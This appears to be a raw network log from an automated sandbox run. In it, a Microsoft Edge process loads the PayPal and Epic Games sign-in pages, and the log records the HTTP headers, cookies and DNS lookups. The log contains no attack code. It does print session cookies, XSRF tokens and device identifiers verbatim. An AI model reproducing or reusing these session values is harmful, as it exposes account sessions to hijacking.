cookie: enforce_policy=ccpa; LANG=en_US%3BUS; tsrce=cspreportnodeweb; x-pp-s=eyJ0IjoiMTY5ODY0ODU1NjU0OCIsImwiOiIwIiwibSI6IjAifQ; l7_az=dcg15.slc; ts=vreXpYrS%3D1793256563%26vteXpYrS%3D1698650363%26vr%3D7f572cee18b0a79830447bb8fd660cb5%26vt%3D7f572cee18b0a79830447bb8fd660cb4%26vtyp%3Dnew; ts_c=vr%3D7f572cee18b0a79830447bb8fd660cb5%26vt%3D7f572cee18b0a79830447bb8fd660cb4; TLTSID=62544276781500915456071760049843; nsid=s%3AAQUVizFN1FmZUKFC1oFjJpB6tTVjuU55.Jv0%2FclXeN8rLVMvg2gDreo3meFj9saf3VPcF%2FSFkRBA

Response

HTTP/2.0 200

accept-ch: sec-ch-ua-full, sec-ch-ua-arch, sec-ch-ua-model, sec-ch-ua-platform-version, sec-ch-ua-full-version, sec-ch-ua-full-version-list, sec-ch-ua-bitness, sec-ch-ua-wow64
cache-control: max-age=0, no-cache, no-store, must-revalidate
content-security-policy: default-src 'self' https://*.paypal.com https://*.paypalobjects.com 'unsafe-inline'; script-src 'self' https://*.paypal.com https://*.paypalobjects.com; img-src 'self' https:; object-src 'none'; form-action 'self' https://*.paypal.com; base-uri 'self' https://*.paypal.com; font-src 'self' https://*.paypalobjects.com https://*.paypal.com; upgrade-insecure-requests;; report-uri https://www.paypal.com/csplog/api/log/csp
content-type: application/json; charset=utf-8
date: Mon, 30 Oct 2023 06:49:24 GMT
dc: ccg11-origin-www-1.paypal.com
etag: W/"28-K7vACu3iSHj8WheeGrIFAajFEvM"
origin-trial: AlIogV3KFtnbfVCyl9Z2NprE7FD8PYCt+TQiYdE3ppeJjJ0xJKcthYwOxXpRCNopxVWdOIENMcNSvQCGAmj0fw0AAAB2eyJvcmlnaW4iOiJodHRwczovL3BheXBhbC5jb206NDQzIiwiZmVhdHVyZSI6IlNlbmRGdWxsVXNlckFnZW50QWZ0ZXJSZWR1Y3Rpb24iLCJleHBpcnkiOjE2ODQ4ODYzOTksImlzU3ViZG9tYWluIjp0cnVlfQ==
paypal-debug-id: 0408914b29760
permissions-policy: ch-ua-platform-version=(self "https://c.paypal.com"),ch-ua-arch=(self "https://c.paypal.com"),ch-ua-wow64=(self "https://c.paypal.com"),ch-ua-model=(self "https://c.paypal.com"),ch-ua-bitness=(self "https://c.paypal.com"),ch-ua-full-version=(self "https://c.paypal.com"),ch-ua-full-version-list=(self "https://c.paypal.com")
server: ECAcc (frc/4CA4)
server-timing: content-encoding;desc="", x-cdn;desc="edgecast"
set-cookie: l7_az=dcg15.slc; Path=/; Domain=paypal.com; Expires=Mon, 30 Oct 2023 07:19:24 GMT; HttpOnly; Secure
set-cookie: ts=vreXpYrS%3D1793342964%26vteXpYrS%3D1698650364%26vr%3D7f572cee18b0a79830447bb8fd660cb5%26vt%3D7f572cee18b0a79830447bb8fd660cb4%26vtyp%3Dnew; Path=/; Domain=paypal.com; Expires=Thu, 29 Oct 2026 06:49:24 GMT; HttpOnly; Secure
set-cookie: ts_c=vr%3D7f572cee18b0a79830447bb8fd660cb5%26vt%3D7f572cee18b0a79830447bb8fd660cb4; Path=/; Domain=paypal.com; Expires=Thu, 29 Oct 2026 06:49:24 GMT; Secure
strict-transport-security: max-age=63072000; includeSubDomains; preload
timing-allow-origin: *
traceparent: 00-00000000000000000000408914b29760-b61fe76c988019d5-01
vary: Accept-Encoding
x-content-type-options: nosniff
x-frame-options: SAMEORIGIN
x-xss-protection: 1; mode=block
content-length: 40
POST

https://www.paypal.com/auth/logclientdata

MicrosoftEdgeCP.exe

Remote address:

192.229.221.25:443

Request

POST /auth/logclientdata HTTP/2.0
host: www.paypal.com
accept: */*
origin: https://www.paypal.com
referer: https://www.paypal.com/signin
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
content-type: application/json;charset=UTF-8
accept-encoding: gzip, deflate, br
content-length: 522
cache-control: no-cache
cookie: enforce_policy=ccpa; LANG=en_US%3BUS; tsrce=cspreportnodeweb; x-pp-s=eyJ0IjoiMTY5ODY0ODU1NjU0OCIsImwiOiIwIiwibSI6IjAifQ; l7_az=dcg15.slc; ts=vreXpYrS%3D1793342964%26vteXpYrS%3D1698650364%26vr%3D7f572cee18b0a79830447bb8fd660cb5%26vt%3D7f572cee18b0a79830447bb8fd660cb4%26vtyp%3Dnew; ts_c=vr%3D7f572cee18b0a79830447bb8fd660cb5%26vt%3D7f572cee18b0a79830447bb8fd660cb4; TLTSID=62544276781500915456071760049843; nsid=s%3AAQUVizFN1FmZUKFC1oFjJpB6tTVjuU55.Jv0%2FclXeN8rLVMvg2gDreo3meFj9saf3VPcF%2FSFkRBA

Response

HTTP/2.0 200

content-encoding: gzip
accept-ch: sec-ch-ua-full, sec-ch-ua-arch, sec-ch-ua-model, sec-ch-ua-platform-version, sec-ch-ua-full-version, sec-ch-ua-full-version-list, sec-ch-ua-bitness, sec-ch-ua-wow64
cache-control: max-age=0, no-cache, no-store, must-revalidate
content-security-policy: default-src 'self' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn; script-src 'nonce-Jwo6U4ZlvP6FKvprXxUZqUVS17vN+TRHxLspwwoBlHunaHni' 'self' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn https://www.recaptcha.net https://www.gstatic.com https://hcaptcha.com https://*.hcaptcha.com 'unsafe-inline'; img-src https://*.paypalobjects.com https://objects.paypal.cn https://*.paypal.com https://*.paypal.cn https://ak1s.abmr.net https://ak1.abmr.net https://ak1s.mathtag.com https://akamai.mathtag.com; object-src 'none'; media-src 'self' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn; font-src 'self' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn; frame-src 'self' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn https://www.google.com https://www.recaptcha.net https://paypal-api.arkoselabs.com https://paypal-api.arkose.com.cn https://hcaptcha.com https://*.hcaptcha.com https://*.qualtrics.com; style-src 'self' 'unsafe-inline' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn https://hcaptcha.com https://*.hcaptcha.com; form-action 'self' https://*.paypal.com https://*.paypal.cn https://*.zettle.com https://*.xoom.com; base-uri 'self' https://*.paypal.com https://*.paypal.cn; connect-src 'self' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn https://hcaptcha.com https://*.hcaptcha.com https://*.qualtrics.com; upgrade-insecure-requests;; report-uri https://www.paypal.com/csplog/api/log/csp
content-type: application/json; charset=utf-8
date: Mon, 30 Oct 2023 06:49:32 GMT
dc: ccg11-origin-www-1.paypal.com
etag: W/"76b-yr8wPcf+8uwGG1tSPJtN1TRZiv4"
origin-trial: AlIogV3KFtnbfVCyl9Z2NprE7FD8PYCt+TQiYdE3ppeJjJ0xJKcthYwOxXpRCNopxVWdOIENMcNSvQCGAmj0fw0AAAB2eyJvcmlnaW4iOiJodHRwczovL3BheXBhbC5jb206NDQzIiwiZmVhdHVyZSI6IlNlbmRGdWxsVXNlckFnZW50QWZ0ZXJSZWR1Y3Rpb24iLCJleHBpcnkiOjE2ODQ4ODYzOTksImlzU3ViZG9tYWluIjp0cnVlfQ==
paypal-debug-id: 05220238542b0
permissions-policy: ch-ua-platform-version=(self "https://c.paypal.com"),ch-ua-arch=(self "https://c.paypal.com"),ch-ua-wow64=(self "https://c.paypal.com"),ch-ua-model=(self "https://c.paypal.com"),ch-ua-bitness=(self "https://c.paypal.com"),ch-ua-full-version=(self "https://c.paypal.com"),ch-ua-full-version-list=(self "https://c.paypal.com")
server: ECAcc (frc/4C92)
server-timing: content-encoding;desc="", x-cdn;desc="edgecast"
set-cookie: enforce_policy=ccpa; Max-Age=31536000; Domain=.paypal.com; Path=/; Expires=Tue, 29 Oct 2024 06:49:32 GMT; Secure
set-cookie: LANG=en_US%3BUS; Max-Age=31556; Domain=.paypal.com; Path=/; Expires=Mon, 30 Oct 2023 15:35:28 GMT; HttpOnly; Secure
set-cookie: tsrce=authchallengenodeweb; Max-Age=259199; Domain=.paypal.com; Path=/; Expires=Thu, 02 Nov 2023 06:49:31 GMT; HttpOnly; Secure
set-cookie: TLTSID=; Path=/; Expires=Thu, 01 Jan 1970 00:00:00 GMT; HttpOnly; Secure
set-cookie: x-pp-s=eyJ0IjoiMTY5ODY0ODU3MjE4OSIsImwiOiIwIiwibSI6IjAifQ; Domain=.paypal.com; Path=/; HttpOnly; Secure
set-cookie: l7_az=dcg15.slc; Path=/; Domain=paypal.com; Expires=Mon, 30 Oct 2023 07:19:32 GMT; HttpOnly; Secure
set-cookie: ts=vreXpYrS%3D1793342972%26vteXpYrS%3D1698650372%26vr%3D7f572cee18b0a79830447bb8fd660cb5%26vt%3D7f572cee18b0a79830447bb8fd660cb4%26vtyp%3Dnew; Path=/; Domain=paypal.com; Expires=Thu, 29 Oct 2026 06:49:32 GMT; HttpOnly; Secure
set-cookie: ts_c=vr%3D7f572cee18b0a79830447bb8fd660cb5%26vt%3D7f572cee18b0a79830447bb8fd660cb4; Path=/; Domain=paypal.com; Expires=Thu, 29 Oct 2026 06:49:32 GMT; Secure
strict-transport-security: max-age=63072000; includeSubDomains; preload
timing-allow-origin: *
traceparent: 00-000000000000000000005220238542b0-d5bbf852147dcac9-01
vary: Accept-Encoding
vary: Accept-Encoding
vary: Accept
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
POST

https://www.paypal.com/platform/tealeaftarget?Content-Type=application%2Fjson&X-PageId=P.3D25VXD73YNWSC8JMJXFMFEWQ9FJ&X-Tealeaf=device%20(UIC)%20Lib%2F6.2.0.2010&X-TealeafType=GUI&X-TeaLeaf-Page-Url=%2Fsignin&X-Tealeaf-SyncXHR=false&X-Tealeaf-MessageTypes=1%2C2%2C5&X-Tealeaf-SaaS-AppKey=76938917d7504ff7a962174c021690bd&X-Tealeaf-SaaS-TLTSID=62544276781500915456071760049843&Content-Encoding=gzip

MicrosoftEdgeCP.exe

Remote address:

192.229.221.25:443

Request

POST /platform/tealeaftarget?Content-Type=application%2Fjson&X-PageId=P.3D25VXD73YNWSC8JMJXFMFEWQ9FJ&X-Tealeaf=device%20(UIC)%20Lib%2F6.2.0.2010&X-TealeafType=GUI&X-TeaLeaf-Page-Url=%2Fsignin&X-Tealeaf-SyncXHR=false&X-Tealeaf-MessageTypes=1%2C2%2C5&X-Tealeaf-SaaS-AppKey=76938917d7504ff7a962174c021690bd&X-Tealeaf-SaaS-TLTSID=62544276781500915456071760049843&Content-Encoding=gzip HTTP/2.0
host: www.paypal.com
origin: https://www.paypal.com
referer: https://www.paypal.com/signin
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-language: en-US
accept: */*
accept-encoding: gzip, deflate, br
content-length: 928
cache-control: no-cache
cookie: enforce_policy=ccpa; LANG=en_US%3BUS; tsrce=authchallengenodeweb; x-pp-s=eyJ0IjoiMTY5ODY0ODU3MjE4OSIsImwiOiIwIiwibSI6IjAifQ; l7_az=dcg15.slc; ts=vreXpYrS%3D1793342972%26vteXpYrS%3D1698650372%26vr%3D7f572cee18b0a79830447bb8fd660cb5%26vt%3D7f572cee18b0a79830447bb8fd660cb4%26vtyp%3Dnew; ts_c=vr%3D7f572cee18b0a79830447bb8fd660cb5%26vt%3D7f572cee18b0a79830447bb8fd660cb4; TLTSID=62544276781500915456071760049843; nsid=s%3AAQUVizFN1FmZUKFC1oFjJpB6tTVjuU55.Jv0%2FclXeN8rLVMvg2gDreo3meFj9saf3VPcF%2FSFkRBA

Response

HTTP/2.0 200

accept-ch: sec-ch-ua-full, sec-ch-ua-arch, sec-ch-ua-model, sec-ch-ua-platform-version, sec-ch-ua-full-version, sec-ch-ua-full-version-list, sec-ch-ua-bitness, sec-ch-ua-wow64
cache-control: max-age=0, no-cache, no-store, must-revalidate
content-security-policy: default-src 'self' https://*.paypal.com https://*.paypalobjects.com 'unsafe-inline'; script-src 'self' https://*.paypal.com https://*.paypalobjects.com; img-src 'self' https:; object-src 'none'; form-action 'self' https://*.paypal.com; base-uri 'self' https://*.paypal.com; font-src 'self' https://*.paypalobjects.com https://*.paypal.com; upgrade-insecure-requests;; report-uri https://www.paypal.com/csplog/api/log/csp
content-type: application/json; charset=utf-8
date: Mon, 30 Oct 2023 06:49:52 GMT
dc: ccg11-origin-www-1.paypal.com
etag: W/"28-wXOWvVAQHPmkGnnO62u1s8HCqYA"
origin-trial: AlIogV3KFtnbfVCyl9Z2NprE7FD8PYCt+TQiYdE3ppeJjJ0xJKcthYwOxXpRCNopxVWdOIENMcNSvQCGAmj0fw0AAAB2eyJvcmlnaW4iOiJodHRwczovL3BheXBhbC5jb206NDQzIiwiZmVhdHVyZSI6IlNlbmRGdWxsVXNlckFnZW50QWZ0ZXJSZWR1Y3Rpb24iLCJleHBpcnkiOjE2ODQ4ODYzOTksImlzU3ViZG9tYWluIjp0cnVlfQ==
paypal-debug-id: 04a5646120118
permissions-policy: ch-ua-platform-version=(self "https://c.paypal.com"),ch-ua-arch=(self "https://c.paypal.com"),ch-ua-wow64=(self "https://c.paypal.com"),ch-ua-model=(self "https://c.paypal.com"),ch-ua-bitness=(self "https://c.paypal.com"),ch-ua-full-version=(self "https://c.paypal.com"),ch-ua-full-version-list=(self "https://c.paypal.com")
server: ECAcc (frc/4D0A)
server-timing: content-encoding;desc="", x-cdn;desc="edgecast"
set-cookie: l7_az=dcg15.slc; Path=/; Domain=paypal.com; Expires=Mon, 30 Oct 2023 07:19:52 GMT; HttpOnly; Secure
set-cookie: ts=vreXpYrS%3D1793342992%26vteXpYrS%3D1698650392%26vr%3D7f572cee18b0a79830447bb8fd660cb5%26vt%3D7f572cee18b0a79830447bb8fd660cb4%26vtyp%3Dnew; Path=/; Domain=paypal.com; Expires=Thu, 29 Oct 2026 06:49:52 GMT; HttpOnly; Secure
set-cookie: ts_c=vr%3D7f572cee18b0a79830447bb8fd660cb5%26vt%3D7f572cee18b0a79830447bb8fd660cb4; Path=/; Domain=paypal.com; Expires=Thu, 29 Oct 2026 06:49:52 GMT; Secure
strict-transport-security: max-age=63072000; includeSubDomains; preload
timing-allow-origin: *
traceparent: 00-000000000000000000004a5646120118-21ca48b9c5102bf8-01
vary: Accept-Encoding
x-content-type-options: nosniff
x-ec-security-audit: 403
x-frame-options: SAMEORIGIN
x-xss-protection: 1; mode=block
content-length: 40
DNS

25.221.229.192.in-addr.arpa

Remote address:

8.8.8.8:53

Request

25.221.229.192.in-addr.arpa

IN PTR

Response
DNS

35.151.70.163.in-addr.arpa

Remote address:

8.8.8.8:53

Request

35.151.70.163.in-addr.arpa

IN PTR

Response

35.151.70.163.in-addr.arpa

IN PTR

edge-star-mini-shv-02-lhr6facebookcom
DNS

71.124.91.77.in-addr.arpa

Remote address:

8.8.8.8:53

Request

71.124.91.77.in-addr.arpa

IN PTR

Response

71.124.91.77.in-addr.arpa

IN PTR
GET

https://www.epicgames.com/id/login

MicrosoftEdgeCP.exe

Remote address:

44.216.163.13:443

Request

GET /id/login HTTP/2.0
host: www.epicgames.com
accept: text/html, application/xhtml+xml, image/jxr, */*
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:48:27 GMT
content-type: text/html
last-modified: Fri, 20 Oct 2023 18:49:04 GMT
vary: Accept-Encoding
etag: W/"6532cba0-2006"
content-security-policy: default-src 'unsafe-inline' 'unsafe-eval' 'self' *.epicgames.com *.unrealengine.com *.twinmotion.com *.fortnite.com data: *.launchdarkly.com *.arkoselabs.com *.arkoselabs.cn *.hcaptcha.com *.uetalon.cn ubistatic2-a.akamaihd.net connect.ubisoft.com cdn.cookielaw.org *.onetrust.com static-assets-prod-1251447533.file.myqcloud.com static-assets-prod-ue-1251447533.file.myqcloud.com sentry.io
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
referrer-policy: origin-when-cross-origin
x-xss-protection: 1; mode=block
document-policy: js-profiling
content-encoding: gzip
GET

https://www.epicgames.com/id/api/reputation

MicrosoftEdgeCP.exe

Remote address:

44.216.163.13:443

Request

GET /id/api/reputation HTTP/2.0
host: www.epicgames.com
referer: https://www.epicgames.com/id/login
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept: application/json, text/plain, */*
accept-language: undefined
accept-encoding: gzip, deflate, br
cookie: _epicSID=dddac527ae1a44b2ac7563ff46bce1ba

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:48:41 GMT
content-type: application/json; charset=utf-8
vary: Accept-Encoding
x-powered-by: PHP 7.2.7
vary: Origin, Accept-Encoding
access-control-allow-credentials: true
content-language: en-US
set-cookie: EPIC_DEVICE=1f01fe95e005438fab0065ff55f7bbc5; Max-Age=63072000; Domain=.epicgames.com; Path=/; Expires=Wed, 29 Oct 2025 06:48:41 GMT; HttpOnly; Secure; SameSite=None
set-cookie: XSRF-TOKEN=f7c1ac43b65043b0b4f4d5c13af52b8d; Path=/id
set-cookie: EPIC_SESSION_REPUTATION=lRifl0tqbegZuPDNvHkWig.TofhDU9-U50R7gPkUySdPmwFul-xm6hUNzI3bmA3F62cFGkWqYG06dymEvU4miQFndUz3QfyH0Nm2aAT7yxv5-Pm7J7Z96CpNsNGTuXtml8NsW9f0KddEtkO1fHB0CxZ-s35vyvKXispxYQx4qXxRbm7PQsVM4kB1bB2lqAsyn5fruD6AzTY1-I6LnOzZXikBsOQHG4yK4PMmwl4-Hgu8PLnQVOo-QOi74tnH0iGCWYBjYAJH0-iC8Lm5LM7X_bm_qNg3Pcn1gaUxgZ2pu6NmHb8wBuAiCjQTWej4Pj4GUm5FdE7nX2-WFB4W1D5x6KEL-ssgsUGi_gqICknYtFYVr-OmB3e8Vz7lV9jQ1UGWNelGlKOaenDB6k8JpoTdrI60NtjuDhmFx3JTPoUabMfLA.1698648521904.86400000.uQoOzK88IQnfwpmPO5cf5g; Max-Age=86400; Domain=.epicgames.com; Path=/id; Expires=Tue, 31 Oct 2023 06:48:42 GMT; HttpOnly; Secure; SameSite=None
set-cookie: EPIC_SESSION_AP=FM6a6QqEjPlmfpXLUvpXog.tWqcEg5OOrkGvuVqiRvWk-VCfEq-1p8Fkac1Ao99VVG_Mf5BOdcV9clEfjHhHKGnC2Ndxt4k3vV5RBaXVLH_db-U9WI0dIelUEm99TZLjflLbEx3AaHA1Il_VCa4dyFswdZonn5jmuHnKq1D2lM0lg.1698648521904.86400000.Kec783Z-rQWVraB2PjURlQ; Max-Age=86400; Domain=.epicgames.com; Path=/id; Expires=Tue, 31 Oct 2023 06:48:42 GMT; HttpOnly; Secure; SameSite=None
x-content-type-options: nosniff
x-frame-options: SAMEORIGIN
x-xss-protection: 1; mode=block
referrer-policy: same-origin
content-security-policy: default-src 'self'; style-src 'self' static-assets-prod.epicgames.com static-assets-prod.unrealengine.com
strict-transport-security: max-age=15552000; includeSubDomains
surrogate-control: no-store
cache-control: no-store, no-cache, must-revalidate, proxy-revalidate
pragma: no-cache
expires: 0
etag: W/"ea-QoDJjxoxE28dPyV2KK1wwxDJKoY"
cache-control: no-cache
content-encoding: gzip
GET

https://www.epicgames.com/id/api/location

MicrosoftEdgeCP.exe

Remote address:

44.216.163.13:443

Request

GET /id/api/location HTTP/2.0
host: www.epicgames.com
referer: https://www.epicgames.com/id/login
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept: application/json, text/plain, */*
cache-etag: eyJhIjoiaHR0cHM6Ly93d3cuZXBpY2dhbWVzLmNvbSIsImIiOmZhbHNlLCJkIjp0cnVlLCJlIjpmYWxzZSwiZyI6IjIwMjMtMTAtMzBUMDY6NDg6MzguNDgxWiIsImgiOjIsImkiOiIxYmYyODE2YjEyMjcxZCJ9
accept-language: undefined
accept-encoding: gzip, deflate, br
cookie: _epicSID=dddac527ae1a44b2ac7563ff46bce1ba

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:48:41 GMT
content-type: application/json; charset=utf-8
vary: Accept-Encoding
x-powered-by: PHP 7.2.7
vary: Origin, Accept-Encoding
access-control-allow-credentials: true
content-language: en-US
set-cookie: EPIC_DEVICE=eb4ae73b5ac94830876e9e283b0a0824; Max-Age=63072000; Domain=.epicgames.com; Path=/; Expires=Wed, 29 Oct 2025 06:48:41 GMT; HttpOnly; Secure; SameSite=None
set-cookie: XSRF-TOKEN=dfc96122ef234e15ace880165ee8b6b3; Path=/id
set-cookie: EPIC_SESSION_AP=WQqIAj_NnqYaCzFYeXNCQQ.RzDEvGUNPL0golYnkUnMwEQOXL2FizKVz8TLzi-wlRYnU7dvhZX9qYqMPZjvCPErWU6lixaitEd4F4octmYje_SqW4NTj--9BLxMV-tHbTwlQ6vA7UacfgAGY3Hhj4wRDLpP9KkU78YkvDc4QgZeXTNtTmecfqMGPksbQO03_YKqTfbKi2KCw6cmBaD1oX1KTRff74n0iEMNXARf3EPOA0c4O9FK7N2_6Q7FHYOeTdaDFQORalJDdUyWCMHb0oZB1S7og2Z_BqGXahUnsTh7yQQ_zFHsvABWDgac_fGDrIvtK0M9pQsxT2xofjiewPL6db3MFGEuU4UT7-zIJVcrmM-0sSqDGC7irGbtcOXm42u3hX93kwbk--2ae57A1LLFoPDzOujY0f-MlVOtH-Zqs1CCJqPjZapvLGXTZZgw44hKI7ErkWyfHmcgBLdvRkkP.1698648521967.86400000.iOt9-zaj1njdnbNh_Gx_Ug; Max-Age=86400; Domain=.epicgames.com; Path=/id; Expires=Tue, 31 Oct 2023 06:48:42 GMT; HttpOnly; Secure; SameSite=None
x-content-type-options: nosniff
x-frame-options: SAMEORIGIN
x-xss-protection: 1; mode=block
referrer-policy: same-origin
content-security-policy: default-src 'self'; style-src 'self' static-assets-prod.epicgames.com static-assets-prod.unrealengine.com
strict-transport-security: max-age=15552000; includeSubDomains
surrogate-control: no-store
cache-control: no-store, no-cache, must-revalidate, proxy-revalidate
pragma: no-cache
expires: 0
etag: W/"8c-2V3z8rFfhmkTxetnEoxS7JuniKo"
cache-control: no-cache
content-encoding: gzip
GET

https://www.epicgames.com/id/api/i18n?ns=messages

MicrosoftEdgeCP.exe

Remote address:

44.216.163.13:443

Request

GET /id/api/i18n?ns=messages HTTP/2.0
host: www.epicgames.com
accept: */*
referer: https://www.epicgames.com/id/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br
cookie: XSRF-TOKEN=dfc96122ef234e15ace880165ee8b6b3; EPIC_SESSION_REPUTATION=lRifl0tqbegZuPDNvHkWig.TofhDU9-U50R7gPkUySdPmwFul-xm6hUNzI3bmA3F62cFGkWqYG06dymEvU4miQFndUz3QfyH0Nm2aAT7yxv5-Pm7J7Z96CpNsNGTuXtml8NsW9f0KddEtkO1fHB0CxZ-s35vyvKXispxYQx4qXxRbm7PQsVM4kB1bB2lqAsyn5fruD6AzTY1-I6LnOzZXikBsOQHG4yK4PMmwl4-Hgu8PLnQVOo-QOi74tnH0iGCWYBjYAJH0-iC8Lm5LM7X_bm_qNg3Pcn1gaUxgZ2pu6NmHb8wBuAiCjQTWej4Pj4GUm5FdE7nX2-WFB4W1D5x6KEL-ssgsUGi_gqICknYtFYVr-OmB3e8Vz7lV9jQ1UGWNelGlKOaenDB6k8JpoTdrI60NtjuDhmFx3JTPoUabMfLA.1698648521904.86400000.uQoOzK88IQnfwpmPO5cf5g; EPIC_SESSION_AP=WQqIAj_NnqYaCzFYeXNCQQ.RzDEvGUNPL0golYnkUnMwEQOXL2FizKVz8TLzi-wlRYnU7dvhZX9qYqMPZjvCPErWU6lixaitEd4F4octmYje_SqW4NTj--9BLxMV-tHbTwlQ6vA7UacfgAGY3Hhj4wRDLpP9KkU78YkvDc4QgZeXTNtTmecfqMGPksbQO03_YKqTfbKi2KCw6cmBaD1oX1KTRff74n0iEMNXARf3EPOA0c4O9FK7N2_6Q7FHYOeTdaDFQORalJDdUyWCMHb0oZB1S7og2Z_BqGXahUnsTh7yQQ_zFHsvABWDgac_fGDrIvtK0M9pQsxT2xofjiewPL6db3MFGEuU4UT7-zIJVcrmM-0sSqDGC7irGbtcOXm42u3hX93kwbk--2ae57A1LLFoPDzOujY0f-MlVOtH-Zqs1CCJqPjZapvLGXTZZgw44hKI7ErkWyfHmcgBLdvRkkP.1698648521967.86400000.iOt9-zaj1njdnbNh_Gx_Ug; _epicSID=dddac527ae1a44b2ac7563ff46bce1ba; EPIC_DEVICE=eb4ae73b5ac94830876e9e283b0a0824

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:48:42 GMT
content-type: application/json; charset=utf-8
x-powered-by: PHP 7.2.7
vary: Origin, Accept-Encoding
access-control-allow-credentials: true
content-language: en-US
x-content-type-options: nosniff
x-frame-options: SAMEORIGIN
x-xss-protection: 1; mode=block
referrer-policy: same-origin
content-security-policy: default-src 'self'; style-src 'self' static-assets-prod.epicgames.com static-assets-prod.unrealengine.com
strict-transport-security: max-age=15552000; includeSubDomains
etag: W/"f9c5-G2BQ/3uIEpu00g6nutXKZEbadAM"
content-encoding: gzip
cache-control: no-cache
GET

https://www.epicgames.com/id/api/i18n?ns=epic-consent-dialog

MicrosoftEdgeCP.exe

Remote address:

44.216.163.13:443

Request

GET /id/api/i18n?ns=epic-consent-dialog HTTP/2.0
host: www.epicgames.com
accept: */*
referer: https://www.epicgames.com/id/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br
cookie: XSRF-TOKEN=dfc96122ef234e15ace880165ee8b6b3; EPIC_SESSION_REPUTATION=lRifl0tqbegZuPDNvHkWig.TofhDU9-U50R7gPkUySdPmwFul-xm6hUNzI3bmA3F62cFGkWqYG06dymEvU4miQFndUz3QfyH0Nm2aAT7yxv5-Pm7J7Z96CpNsNGTuXtml8NsW9f0KddEtkO1fHB0CxZ-s35vyvKXispxYQx4qXxRbm7PQsVM4kB1bB2lqAsyn5fruD6AzTY1-I6LnOzZXikBsOQHG4yK4PMmwl4-Hgu8PLnQVOo-QOi74tnH0iGCWYBjYAJH0-iC8Lm5LM7X_bm_qNg3Pcn1gaUxgZ2pu6NmHb8wBuAiCjQTWej4Pj4GUm5FdE7nX2-WFB4W1D5x6KEL-ssgsUGi_gqICknYtFYVr-OmB3e8Vz7lV9jQ1UGWNelGlKOaenDB6k8JpoTdrI60NtjuDhmFx3JTPoUabMfLA.1698648521904.86400000.uQoOzK88IQnfwpmPO5cf5g; EPIC_SESSION_AP=WQqIAj_NnqYaCzFYeXNCQQ.RzDEvGUNPL0golYnkUnMwEQOXL2FizKVz8TLzi-wlRYnU7dvhZX9qYqMPZjvCPErWU6lixaitEd4F4octmYje_SqW4NTj--9BLxMV-tHbTwlQ6vA7UacfgAGY3Hhj4wRDLpP9KkU78YkvDc4QgZeXTNtTmecfqMGPksbQO03_YKqTfbKi2KCw6cmBaD1oX1KTRff74n0iEMNXARf3EPOA0c4O9FK7N2_6Q7FHYOeTdaDFQORalJDdUyWCMHb0oZB1S7og2Z_BqGXahUnsTh7yQQ_zFHsvABWDgac_fGDrIvtK0M9pQsxT2xofjiewPL6db3MFGEuU4UT7-zIJVcrmM-0sSqDGC7irGbtcOXm42u3hX93kwbk--2ae57A1LLFoPDzOujY0f-MlVOtH-Zqs1CCJqPjZapvLGXTZZgw44hKI7ErkWyfHmcgBLdvRkkP.1698648521967.86400000.iOt9-zaj1njdnbNh_Gx_Ug; _epicSID=dddac527ae1a44b2ac7563ff46bce1ba; EPIC_DEVICE=eb4ae73b5ac94830876e9e283b0a0824

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:48:42 GMT
content-type: application/json; charset=utf-8
x-powered-by: PHP 7.2.7
vary: Origin, Accept-Encoding
access-control-allow-credentials: true
content-language: en-US
x-content-type-options: nosniff
x-frame-options: SAMEORIGIN
x-xss-protection: 1; mode=block
referrer-policy: same-origin
content-security-policy: default-src 'self'; style-src 'self' static-assets-prod.epicgames.com static-assets-prod.unrealengine.com
strict-transport-security: max-age=15552000; includeSubDomains
etag: W/"8fd-gXLhN5OiONulDAF4mTTtmsi92Lg"
content-encoding: gzip
cache-control: no-cache
GET

https://www.epicgames.com/id/api/analytics

MicrosoftEdgeCP.exe

Remote address:

44.216.163.13:443

Request

GET /id/api/analytics HTTP/2.0
host: www.epicgames.com
referer: https://www.epicgames.com/id/login
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept: application/json, text/plain, */*
x-requested-with: XMLHttpRequest
x-epic-strategy-flags:
x-epic-event-category: null
x-epic-event-action: null
x-epic-client-id: undefined
x-epic-display-mode: web
x-epic-platform: WEB
x-epic-duration: 12997
